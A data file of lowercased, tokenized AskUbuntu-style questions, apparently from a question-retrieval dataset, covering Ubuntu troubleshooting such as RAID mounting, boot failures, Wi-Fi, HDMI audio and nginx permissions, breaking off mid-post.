444016	how to mount intel matrix raid 0 on ubuntu 13.10 live ?	i 'm not a heavy ubuntu user . i have a sony vaio z series laptop with two 64gb ssd disk working in raid 0 ( intel matrix - intel rapid storage technology ) under windows 7 . the quest is to mount this raid 0 volume under ubuntu 13.10 live ( started form usb stick ) and then run clamav for viruses check . i have read this : ubuntu 11.04 on sony vaio ssd raid 0 and this : isw/fakeraid - dmraid : - status : broken but i ca n't still understand how to mount this volume . can anyone please explain to me in plain english how to do it ? the result of fdisk -l : disk /dev/sda : 64.0 gb , 64023257088 bytes 255 heads , 63 sectors/track , 7783 cylinders , total 125045424 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x01ec5406 device boot start end blocks id system /dev/sda1 2048 30359551 15178752 27 hidden ntfs winre /dev/sda2 * 30359552 30564351 102400 7 hpfs/ntfs/exfat /dev/sda3 30564352 250079231 109757440 7 hpfs/ntfs/exfat disk /dev/sdb : 64.0 gb , 64023257088 bytes 255 heads , 63 sectors/track , 7783 cylinders , total 125045424 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdc : 16.0 gb , 16013852672 bytes 78 heads , 14 sectors/track , 28641 cylinders , total 31277056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a36fb device boot start end blocks id system /dev/sdc1 * 8064 31277055 15634496 c w95 fat32 ( lba ) the result of dmraid -s : error : isw : wrong number of devices in raid set `` isw_iffifahhi_volume0 '' [ 1/2 ] on /dev/sdb *** group superset isw_iffifahhi -- > subset name : isw_iffifahhi_volume0 size : 125040896 stride : 256 type : stripe status : broken subsets : 0 devs : 1 spares : 0 the result of : ls -la /dev/mapper/ total 0 drwxr-xr-x 2 root root 60 apr 6 2014 . drwxr-xr-x 16 root root 4200 apr 6 14:01 .. crw -- -- -- - 1 root root 10 , 236 apr 6 2014 control
444018	unable to write files to blank cd/dvd	every-time i insert a cd/dvd into my toshiba satellite series laptop installed 13.10 ( 64 ) i receive this auto start message . through some surfing i found disabling of gnome-fallback-mount-helper.desktop should be helpful but i can not find ways to disable ! !
444021	ubuntu not booting on hp pavilion 17 177-sb with uefi bios	i bought my new laptop yesterday it 's a hp pavilion 17 177-sb i believe and it has a uefi bios so i usually install ubuntu the day i buy laptops and i did that this time too . i can only boot and shutdown the os a few times before it crashes at the gnome logo saying it stopped all the services and then the screen goes black and the windows 8 hp logo appears and it just boots win8 perfectly fine but ubuntu wo n't boot i currently have secure boot turned on ( does n't really matter because it does n't get fixed when i turn it of ) and legacy support disabled ! only a reinstall helps and it just keeps screwing it up if someone can help me with this i would appreciate it ! thanks , noahvt
444026	world of warcraft in ubuntu 12.04 lts	i have tried launching 'the blizzard game downloader ' , using wine , yet it does not get to the loading screen before it crashes , and ends with an error message . neither does trying to load the game through playonlinux . i am an absoloute ubuntu noob also . any help would be much appreciated . ( preferable patch 5.4 support )
444027	ssh copy id failed	where should be an error ? local pc is ubuntu . command : ssh-copy-id user @ example.com result : /usr/bin/ssh-copy-id : info : attempting to log in with the new key ( s ) , to filter out any that are already installed /usr/bin/ssh-copy-id : info : 1 key ( s ) remain to be installed -- if you are prompted now it is to install the new keys user @ example.com 's password : exec request failed on channel 0
444030	globalmenu does n't work for some apps ( ubuntu 13.10 )	after latest update of ubuntu 13.10 global menu for some apps does n't work . global application menu bar is there but links does n't work . all buttons that can be used are working , but global applications menu is useless . so i am not able to fully use apps . menu does n't work in : libreoffice , image viewer ( eog ) , terminal menu works in : firefox , file manager ... i have tried to reset unity but it does n't help . when i remove libreoffice-gtk , menu in libreoffice looks ugly , but it works fine . when i log as guest it is same . global menu does n't work . help !
444033	100 % i/o usage due to jbd2	i have 14.04 beta 2 64-bit and intel i7 processor with 2.2ghz clock , 4 gb ram and 500 gb harddrive . after using ubuntu for some time , everything goes so slow and i can not even move my usb mouse cursor , but only touchpad . not possible to open even a terminal window . here is the iotop output : how do i get rid of this thing ?
444034	i wish to record the names of all applications and drivers installed on my pc	i wish to record all applications and drivers installed on my pc ( so that i can refresh my machine exactly on rebuild ) either so that i can automate a full rebuild or simply so that i have a list that i dont forget anything . i.e . a list of all apps , plugs ins and drivers together with a version number . is there a way one can do this ? thks
444035	not able to boot either windows or ubuntu	i have been trying boot-repair with different setting but this is the results of me doing it with recommended settings http : //paste.ubuntu.com/7212513/ . i really need to be able to boot into my computer . any help is appreciated
444038	problem connecting to some websites	i 've some problem connecting to certain websites , using ubuntu 12.04 in dual boot windows 7 . websites like https : //github.com/ , https : //developer.paypal.com/ and https : //www.facebook.com/ keeps on loading for long time . its so weird , it opens sometimes , then it does n't sometimes . i do n't know how to debug this issue . so far what i tried is using ping command . $ ping github.com ping github.com ( 192.30.252.129 ) 56 ( 84 ) bytes of data . -- - github.com ping statistics -- - 92 packets transmitted , 0 received , 100 % packet loss , time 90999ms on doing that on google , it works fine . $ ping google.com ping google.com ( 74.125.236.73 ) 56 ( 84 ) bytes of data . 64 bytes from maa03s05-in-f9.1e100.net ( 74.125.236.73 ) : icmp_req=1 ttl=56 time=26.1 ms 64 bytes from maa03s05-in-f9.1e100.net ( 74.125.236.73 ) : icmp_req=2 ttl=56 time=27.7 ms 64 bytes from maa03s05-in-f9.1e100.net ( 74.125.236.73 ) : icmp_req=3 ttl=56 time=26.0 ms 64 bytes from maa03s05-in-f9.1e100.net ( 74.125.236.73 ) : icmp_req=4 ttl=56 time=26.2 ms -- - google.com ping statistics -- - 5 packets transmitted , 5 received , 0 % packet loss , time 4005ms rtt min/avg/max/mdev = 25.070/26.259/27.798/0.882 ms really need some help ! ! i tried googling , not even sure how to search it ! ! ( using wireless )
444041	second monitor not displaying on boot up	i have 2 monitors connected one with vga and one with hdmi . when i boot up the hdmi one does n't does n't display anything . i can tell it is recognizing some kind of input ( it does n't go into sleep mode ) . if i turn the monitor off and on it will sometimes flicker and other times just flicker . sometimes unplugging it from my computer and plugging it back in will work . other times resetting my display settings will work . i thought this was a drivers issue with my nvidia card so i switched over to my intel internal graphics but this did n't help . i using 13.10 with intel ivybridge graphics ( previously and nvidia gt620 card ) . any help is appreciated ! ! video driver ( from running lshw -c video ) : driver=i915 ( should just be the intel one like i said in the question kernel : 3.8.0-35-generic x : 1.14.5 also wanted to say that this only occurs on boot or when left idle for some time . its lenovo ideacentre k410 desktop .
444042	receiving sudo : no tty present and no askpass program specified	i 'm attempting to use dokku / digital ocean to push my rails application live and i 'm running into an error when trying to configure dokku . command line is not my strong suit , so any help as to the cause / solution would be great . thanks . deploy @ app : ~ $ cat ~/.ssh/id_rsa.pub | ssh deploy @ ip_address `` sudo gitreceive upload-key progrium '' sudo : no tty present and no askpass program specified
444044	ca n't print with brother mfc 440cn over network - [ returning ipp client-error-document-format-not-supported for print-job ]	i 've been trying to get my brother mfc 440cn printer to print over the network using linux mint as the print server ( connected via usb ) with a windows 8 computer as the client . i have been able to send a test page from it fine , but the prevailing error that i get ( from cups ) is : returning ipp client-error-document-format-not-supported for print-job . i 've exhausted google and tried everything i 've found and ca n't get it . while trying everything , i 've introduced a few new errors , but i 've had some of them before and gotten rid of them , and still , i ca n't figure out the above error . does anyone have any suggestions and thanks in advance.. i have it setup in smb.conf as well .
444046	`` preinstalled '' dvd iso	on the ubuntu on lenovo thinkpad page for the w540 , 12.04 lts is listed as available `` preinstalled '' , but apparently not in the us . is there any way to get the iso for this oem installation , or if not , the exact list of drivers that i need ?
444047	restoring rights for /var	i accidentally ran `` sudo chown www-data /var -r '' . right after i ran `` sudo chown root /var -r '' to restore the rights . i can however no longer login now . i 'm still getting the full disk encryption password step , though not the one after that . to fix the issue , i need to know where the owner can not be root , so i can change it back . i can still get to the root shell via recovery mode . any pointers ? i 'm using ubuntu 13.10 .
444048	customise suspend operation or create custom power option ?	so basically i am using ubuntu saucy salamander and i would like to be able to wake it from suspend over wireless . i can already do it when it has a wired connection but this doesnt really fit my needs . is it possible to have power to the wireless card constantly , or create a custom power option which acts the same as suspend but does not disable the wifi on the laptop ? any ideas for this ? thanks
444049	screen resolution extension on ubuntu 13.10 netbook ( newrez not working )	ubuntu 13.10 isnt running newrez which extends the screen resolution . but it was fine with the 12.04 . let me know how to run the script and how to run the script on startup.. just like 12.04 version .
444051	how to make ubuntu never use specified dns server ? ( dnsleak issues )	im using vpn and dnsleaktest.com shows me that it discovered vpn dns and my isp dns . i want to avoid using isp dns when using vpn . i found i can use prepend domaine name servers in /etc/dhcp/dhclient.conf but all it does is give the psecified dns a priority so it doesnt disable isp dns .
444052	i only want to run ubuntu - should i partition my hard drive before i install ubuntu ?	i have an old desktop that runs xp . since i do use this computer on an internet connected network , i feel it 's best to replace that soon-to-be no longer supported version of microsoft and look forward to moving to linux ( learning curve and all ) . i 've backed up everything that i want to take with me . i 'm not interested in running any version of windows , only ubuntu ( 12.04 i 'm thinking ) . do you recommend that i still partition my hard drive for the install and then remove windows or remove it first and then install ubuntu and why ? thanks so much for your help !
444056	i changed to ubuntu , lost my files . how do i get them back ?	so as you guys will probably know , the support for windows xp will be removed . i decided to change to ubuntu and i already love it ! however , i have found a major issue , and have lost all of my original files from when i had xp . they are not inside any of the folders . i need these files back urgently , please help !
444059	how to edit a specific line of textfile in terminal with a script ?	i need to change a .config text file every time the program does n't work as i want it to . i want to be able to do it in terminal preferably with an alias and with the following logic : alias config='change line 17 to this then run this command then replace line 17 with what was at beginning' so when i enter config into terminal the offending line will be changed , after which a command will be run , after which the line will be set to be what it was at beginning
444061	system wo n't recognize any wifi networks	i have recently built a new computer , and first ran it with ubuntu . after installation i go to setup my wifi so i can download drivers and games but my wifi will not ever connect even after i put in all the necessary ip addresses . if you could tell how to connect it back that would be great . and another thing that might be tricky is that i have no ethernet connections in my house so i can not simply download drivers and switch . the pc is `` off the grid '' until i get wifi to work .
444064	'tail ' command not getting only the new lines	i 'm using the command : tail -f -n 0 file.txt but it keeps repeating itself . what i 'm doing is the following : create the file in the first terminal : touch file.txt start the tail in the second terminal : tail -f -n 0 file.txt edit the file in the first terminal : nano file.txt just add text , save and close . the second terminal outputs text like it should . edit the file again in the first terminal : nano file.txt add in the end ( 2nd line ) more text , save and close . the second terminal outputs : tail : file.txt : file truncated text more text edit the file again in the first terminal : nano file.txt add in the end ( 3rd line ) even more text , save and close . the second terminal outputs even more text like it should . edit the file again in the first terminal : nano file.txt add in the end ( 4th line ) and even more text , save and close . the second terminal outputs : tail : file.txt : file truncated text more text even more text and even more text i need the command to not repeat itself . the output resulted in : tail -f -n 0 file.txt text tail : file.txt : file truncated text more text even more text tail : file.txt : file truncated text more text even more text and even more text and i need it to output : tail -f -n 0 file.txt text more text even more text and even more text or , if it 's not possible to remove the `` file truncated '' message , something like : tail -f -n 0 file.txt text tail : file.txt : file truncated more text even more text tail : file.txt : file truncated and even more text i also do n't know why it gives the file truncated message . i start inserting the new text at the end of the file .
444065	how to install enlightenment 19 on lubuntu 14.04	all guides are for old version of ubuntu and enlightenment . im compiling from source but the efl package says configure : error : software xlib dependencies not found ive been able to install many other dependencies ( which were also showing errors different than packagenames ) but i have no idea what the package for xlib is .
444066	wi-fi connection problem	i have build in ubuntu in i5 . it has kernel version 3.5.0-47-generic . the main problem is it 's wi-fi was working completely fine but after some updates installation it stopped working and now i am having problems in connecting it to my wi-fi .
444067	can i recover windows after ubuntu installation ?	i am not the best guys in the world with computers ... however , i was wondering , if it is possible to make a full intallation of ubuntu on my pc , and make a backup of the windows 8 currently on it . if i one day would regret my installation of ubuntu , would it be possible to install windows from the backup i made , and use the same product key , or is it not ? ( i wan na erase windows if i install ubuntu ... only want one os : d ) i would just hate it , if i lost the windows i got on the pc when i bought it .
444068	ubuntu 12.04 boots to command line after upgrade	today package manager suggested the usual updates and i installed everything . after it prompted for reboot , ubuntu restarted in command line mode . not sure what to do here . by browsing the forum it seems as though this might have to do with nvidia drivers . i tried `` startx '' ( black screen with flashing cursor on top left ) , and ctrl-alt-f1 ( nothing happens ) . i also tried to reboot in failsafex graphic mode but i get the following error : fatal server error no screens found server terminated with errors not sure where to go from here . i need to get back in graphical mode asap and i 'm ok with a faster solution even w/o nvidia drivers . any help would be appreciated . edit : just clarifying that a ) i can log on from terminal and b ) i am assuming this is an nvidia issue but have no certainty .
444073	error : `` no package 'libgpod-1.0 ' found '' when trying to install gtkpod2.1.4	i am very new to using ubuntu but i know the basics . i 've been having a series of errors while trying to compile gtkpod2.1.4 . i 've managed to fix most of them so far with a little googling , mostly just needed to install dev packages . at this point i am well and truly stuck though . every time i run ./configure , i get this output : checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to enable maintainer-specific portions of makefiles ... no checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking how to print strings ... printf checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking how to run the c preprocessor ... gcc -e checking for ansi c header files ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes checking how to run the c++ preprocessor ... g++ -e checking for ld used by g++ ... /usr/bin/ld -m elf_x86_64 checking if the linker ( /usr/bin/ld -m elf_x86_64 ) is gnu ld ... yes checking whether the g++ linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking for g++ option to produce pic ... -fpic -dpic checking if g++ pic flag -fpic -dpic works ... yes checking if g++ static flag -static works ... yes checking if g++ supports -c -o file.o ... yes checking if g++ supports -c -o file.o ... ( cached ) yes checking whether the g++ linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking dynamic linker characteristics ... ( cached ) gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking for library containing strerror ... none required checking whether nls is requested ... yes checking for intltool > = 0.33 ... 0.50.2 found checking for intltool-update ... /usr/bin/intltool-update checking for intltool-merge ... /usr/bin/intltool-merge checking for intltool-extract ... /usr/bin/intltool-extract checking for xgettext ... /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for gmsgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.14.2 checking for xml : :parser ... ok checking whether ln -s works ... yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.16 ... yes checking for pkg-config ... ( cached ) /usr/bin/pkg-config checking for gtk ... yes checking for glib ... yes checking for gdk ... yes checking for gmodule ... yes checking for gthread ... yes checking for libgpod ... no configure : error : in `/home/leo/downloads/gtkpod-2.1.4 ' : configure : error : *** no package 'libgpod-1.0 ' found see `config.log ' for more details any idea how to fix this ? i can not seem to find the package necessary . thanks , leo .
444076	can not make minecraft.jar executable	im trying to excute the minecraft.jar . ive tried to run several commands but always coming back with `` unable to access jarfile '' my file is stored on my downloads and i am the owner it says on file properties . any ideas ? thanks !
444082	how to check if $ 1 and $ 2 are null ?	i am running some script which passing the string argument and i want to do if else statement shown as below : if [ $ 1 ! = '' ] & & [ $ 2 ! = '' ] then do something ... .. but it shown error too many argument . why ?
444084	ubuntu hdmi sound not working	i recently installed ubuntu 13.10 , and have been having a lot of problems with sound . i am using my ati 4670 to display picture ( which works great ) and sound ( which does n't work at all ) through hdmi . i have gone through many threads and in many it appears people can not get the hdmi sound option to appear , which is not my case . the option appears in gnome alsa mixer and pulse audio . i have checked to make sure the hdmi sound is the primary sound output with no luck in gnome and pulse . i have also installed the oem-audio-hda-daily-dms without luck . please help , thanks
444086	forgotten password , need assistance with no grub menu	this is my first time using linux so i 'm still new to all this . i have forgotten my admin password , and i 've tried opening the grub menu after a reboot , but it does n't open even after holding down the left shift key . so i think i have the grub bug , but i ca n't install the fix b/c of not remembering my admin password ... so i find myself stuck ... . if anyone has any information about this it would be greatly appreciated .
444087	i can not get the max resolution out of my laptop monitor	i am new to ubuntu , running 13.10 . while i was running ubuntu 12.xx , i had no issues at all , i am hoping to fix the screen issue i am having now . my computer is a gateway nv79 laptop , max resolution is 1200x900 . the `` details screen '' says : vesa : intel速ironlake mobile graphics . the outpu of xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected primary 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 i have also installed arandr , but i have no idea how to make a .screenlayout file to get my resolution up to 1200x900 . thanks in advance .
444088	no internet and black screen after upgrade	i decided to upgrade from 12.04 to 12.10 today , everything went fine and rebooted when asked , but after ubuntu logo screen it goes black . and instead of a recovery mode in grub there is ( ) at the endof the second ubuntu . there is no ( on /dev/sda ) after ubuntu either.i can boot into kali linux just fine ps . i cant connect to internet from ubuntu ( ) command line either please help
444090	modifying sysctl values inside lxc container	i have made several linux containers using the normal userspace tools ( not docker ) , and i have been setting up a test environment . i want to set up two containers to try out heartbeat , which requires the containers to bind to and ip address that is not yet configured , namely net.ipv4.ip_nonlocal_bind=1 everytime i try it , it says something like this : user @ lxc1 : ~ $ sudo sysctl -w net.ipv4.ip_nonlocal_bind=1 sysctl : can not stat /proc/sys/net/ipv4/ip_nonlocal_bind : no such file or directory also modifying the sysctl.conf file doesnt help . so i did some research , and aparently the guest container binds to the host 's /proc/sys ( which makes sense ) , so i modified the hosts value by adding the proper value to the hosts sysctl.conf and then i rebooted the host for good measure : user @ host : ~ $ sudo sysctl -a | grep -i nonlocal net.ipv4.ip_nonlocal_bind = 1 as noted above , the host reflects the configuration that i want to see the in guest container , but even after rebooting , the container -still- shows the same problem . how do i modify these values in the guest container , is it even possible ?
444091	how do i get a tp-link n600 tl-wdn3200 wireless adapter working ?	i am new to ubuntu and this is the first time i tried to install ubuntu . i burned 12.04 on a cd and installed it but wi-fi is not connecting it keeps asking for authentication . my wi-fi adapter is tp-link n600 tl-wdn3200 after some time browsing the web on my phone i came across saying that the adapter uses ralink chipset meaning a ralink driver can be installed but installing this i have no clue it 's pci or something link is here for the drivers is this of valuable information to get my wifi working ? http : //www.mediatek.com/en/downloads/ ? sort=os discovered that my wpa2 key is too long by 1 digit is there a way to overide or change the limit ?
444096	how do i replace content of xml file by using shell scripting sed command ?	i have a config.xml file which shows : < userid > myuserid < /userid > < password > mypass < /password > how can i replace myuserid and mypass by using sed ?
444100	how to boot from usb . error : unknown filesystem . grub rescue >	i tried with ls and set root= ... and set prefix= ... for all possibilities , but when i come to insmode normal its response is : error : unknown filesystem . grub rescue > can you help me please ?
444103	ubuntu and arm : why half the packages are missing ?	so , i 'm on an arm chromebook and trying to install nodejs/npm . when i do sudo apt-get install nodejs , i have two dependencies missing : libv8 and libc-ares2 . but these packages are availables on the debian packages : ex : https : //packages.debian.org/sid/armhf/libv8-3.14.5/download so , when i want to install them , it works fine . cool . but now i want to install npm , and i have 10+ unmet dependencies . so ... do i need to download them all from the debian repo ? how to resolve this ?
444104	make .jar executable on chrubuntu via command	im running chrubuntu , im trying to run a minecraft jar file via command ( as is not possible via properties page ) whatever command im using its telling me that no such file exists , i think this may be to do with incorrect ownership of the file ? any advice , thanks !
444108	how to remove files created by sudo make install	i was installing llvm using sudo make install but due to space constraint it was not completed and got failed but in the meanwhile it has created so many heavy files in my machine so that now i am running out of space . can someone tell me how to delete files that were created during installation . thanks in advance .
444116	cd : /home : no such file or directory	i saw loads of posts with similar issues ; i 've looked at the solutions with no luck so far . i use ubuntu 12.04 lts desktop , installed in partition sda5 , mounted as / . the main part of the disk is allocated to sda6 , mounted as /home . i can not either : cd into this home directory use mkdir to create a sub folder i can see it and create files etc , when logged in as root , using nautilus , but from a terminal i just get : -su : cd : /home : no such file or directory i am new to ubuntu ( coming fom windows ) and although i thought i was getting to grips with it , this has me beat . any help appreciated . tia
444122	how to transfer mysql database from windows to ubuntu ?	i want to transfer my database from wamp on my local machine to my ubuntu vps . can i just copy the folder of the database from c : \wamp\bin\mysql\mysql5.6.12\data to /var/lib/mysql ?
444124	how to add a loopback interface ?	i want to add two more loopback interfaces . i used the following command : ifconfig lo : 127.0.0.2 netmask 255.0.0.0 up and type in ifconfig , i can see the loopback address was added . but if i want to add one more interface ... ( for example 127.0.0.3 ) the previous interface ( 127.0.0.2 ) was overwritten . also when i look in /etc/network/interfaces i see no entry . how can i add multiple loopback interfaces permanently ?
444127	how to access ubuntu	i have downloaded and installed ubuntu from cd , but it does n't show up when i reboot . how do i switch from windows to ubuntu ?
444129	zip i/o error : protocol error in bash script	so here 's the script that i am trying to get it work : # ! /bin/bash filepath= '' $ 1 '' filename= '' $ ( basename `` $ filepath '' ) '' backupdir= '' /my/backup/dir/ $ { filename } -backups/ '' datetime= $ ( date `` + % d. % m. % y_ % h : % m : % s '' ) # check if backup folder exists if not create them if [ ! -d `` $ backupdir '' ] ; then mkdir `` $ backupdir '' fi # create the backup in a zip-file zip -r `` $ { backupdir } $ { filename } - $ { datetime } .zip '' `` $ filepath '' this error appears : zip i/o error : protocol error zip error : could not create output file ( /my/backup/dir/filename-backups/filename-06.04.2014_18:54:58.zip ) the problem seems to be the `` datetime '' variable . without this variable the script runs faultless . edit : ok the problem are the double points in the date string : datetime= $ ( date `` + % d. % m. % y_ % h : % m : % s '' ) if i change it to datetime= $ ( date `` + % d. % m. % y_ % h- % m- % s '' ) it works for me . not really nice , but if there no other possibility ...
444132	hdmi audio on optimus system	i have an asus g46vw ( specs below ) running ubuntu 14.04 build 05/05/14 and this laptop has intel card and a discrete 660m . i am very excited to have hdmi working with optimus . but i have one last thing that is driving me nuts . audio over hdmi . i have tried googled the crap out of this issue and i am pretty good at figuring things out for myself through forum reading but i have had no luck so far . pulseaudio does not list my hdmi output . maybe i need to update pulse audio ? below is more info . list of playback hardware devices # aplay -l card 0 : pch [ hda intel pch ] , device 0 : vt1802 analog [ vt1802 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : vt1802 digital [ vt1802 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 2 : vt1802 alt analog [ vt1802 alt analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 # cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7a10000 irq 46
444138	ubuntu dual boot	is it safe to install ubuntu 12.04 on a samsung nc-110 netbook from a liveusb , or does it have uefi problems ? i 'd like to install ubuntu alongside my current windows 7 os , but i googled `` problems dual booting ubuntu '' and 'samsung uefi ' appeared a lot . i do n't really want to brick my computer , and so was wondering whether it would be safe to dual boot or not ? thanks : )
444139	file not found on http : //localhost:8080/	i have just installed tomcat7 using apt-get install tomcat7 . in catalina_home i can see default index.html file and it runs fine using localhost:8080/ . now i have placed a .war file to deploy in this same folder and run http : //localhost:8080/javabridge.war and http : //localhost:8080/javabridge as well , but it wo n't work . it says http status 404 - /javabridge . what am i doing wrong ?
444145	system hang after waking up from hibernation ?	i have played with all of my power settings for what i want me want my laptop to do as far as when i close my lid or press power button but it is not quite working correctly heres is what 's going on : what i would like my laptop to do when i close the lid is to go into hibernation , which it does . when i open my lid and use any key to wake is up , it wakes up no problem . the problem is that everything is locked up and is un-clickable.my system is set to be unlocked , my mouse pointer will move , but when i click on something or try and do anything , nothing happens . from that point i have to hold down my power button and force shutdown , and then power back up and everything is ok after that . i know it is not good to keep doing a forced shutdown . what should i do ?
444154	how system knows to run files in bin directory	i know there are /bin , /sbin , /usr/bin , /usr/local/bin and ... , which if put my file on that i can run that in terminal . my question is this how terminal knows to look at these paths ? may be you say by bashrc but i do not find for example sbin in mybashrc . another way to ask is there specific file that these paths are there ? or can we add our path to that . ( i 'm not talking about bashrc )
444155	file permissions and applications	how does ubuntu protect against executable files which become executable through another installed app changing the permissions ? i mean it is possible to check applications do not change file permissions by checking their code but is there any other way of doing that ?
444157	how do i control which drive ubuntu installs to ?	i have 2 320 gb drives on my computer . i have windows 7 installed on drive c : how do i install ubuntu onto drive d , and still have dual boot capability ?
444158	how do i disable xorg/compiz et al from a computer that has a graphics board ?	i have a desktop computer i want to use as file server . it has `` stock '' ubuntu 12.04 installed . ubuntu thinks the computer has an video monitor hooked-up , which it has not . how do i tell ubuntu it has n't ? i did uncomment the line grub_terminal=console in /etc/default/grub and ran update-grub . this does n't seem to do what i want , i still see xorg and compiz in the process list after a re-boot . what did i do wrong ? per .
444161	error in update and upgrade	following are some of the errors that i am getting while using the command : sudo apt-get update & & sudo apt-get upgrade w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg could not connect to pk.archive.ubuntu.com:80 ( 58.65.218.244 ) . - connect ( 110 : connection timed out ) w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources unable to connect to pk.archive.ubuntu.com : http : e : some index files failed to download . they have been ignored , or old ones used instead .
444162	error ( 13 : permission denied ) in nginx 1.4.1	i am facing this issue on my nginx setup on ubuntu 13.10 i got these weird error on the log of my local domain 2014/04/06 21:29:37 [ crit ] 18065 # 0 : *3 stat ( ) `` /media/user/backup/sites/sp/ '' failed ( 13 : permission denied ) , client : 127.0.0.1 , server : sp.local , request : `` get / http/1.1 '' , host : `` sp.local '' 2014/04/06 21:29:37 [ crit ] 18065 # 0 : *3 stat ( ) `` /media/user/backup/sites/sp/ '' failed ( 13 : permission denied ) , client : 127.0.0.1 , server : sp.local , request : `` get / http/1.1 '' , host : `` sp.local '' 2014/04/06 21:29:37 [ crit ] 18065 # 0 : *3 stat ( ) `` /media/user/backup/sites/sp/index.php '' failed ( 13 : permission denied ) , client : 127.0.0.1 , server : sp.local , request : `` get / http/1.1 '' , host : `` sp.local '' this configuration was working before upgrading to this version 13.10 the permissions on this folder is : 755 & there is no log recorded on php fpm error log i had did every idea to fix it with no luck could you please suggest / help me , it would be appreciated thanks update : i am not using selinux the files are located in non encrypted drive nginx is installed on encrypted drive / , is this the issue ? ? relevant mount point : /dev/sda3 on /media/tawfek/backup type ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) ls -l output : total 712 drwsr-xr-x 6 tawfek tawfek 4096 apr 6 21:26 app drwsr-xr-x 8 tawfek tawfek 4096 apr 6 21:26 downloader drwsr-xr-x 3 tawfek tawfek 4096 apr 6 21:25 errors drwsr-xr-x 2 tawfek tawfek 4096 apr 6 21:26 includes drwsr-xr-x 15 tawfek tawfek 4096 apr 6 21:25 js drwsr-xr-x 13 tawfek tawfek 4096 apr 6 21:25 lib drwsr-xr-x 13 tawfek tawfek 4096 apr 6 21:26 media drwsr-xr-x 3 tawfek tawfek 4096 apr 6 21:25 nbproject drwsr-xr-x 2 tawfek tawfek 4096 mar 8 13:10 pear drwsr-xr-x 2 tawfek tawfek 4096 apr 6 21:25 pkginfo drwsr-xr-x 2 tawfek tawfek 4096 apr 6 21:25 shell drwsr-xr-x 5 tawfek tawfek 4096 apr 6 21:25 skin drwsr-xr-x 11 tawfek tawfek 4096 apr 6 21:25 var -rwxr-xr-x 1 tawfek tawfek 2834 feb 1 11:39 api.php -rwxr-xr-x 1 tawfek tawfek 2831 feb 1 11:39 cron.php -rwxr-xr-x 1 tawfek tawfek 716 mar 24 22:38 cron.sh -rwxr-xr-x 1 tawfek tawfek 1150 feb 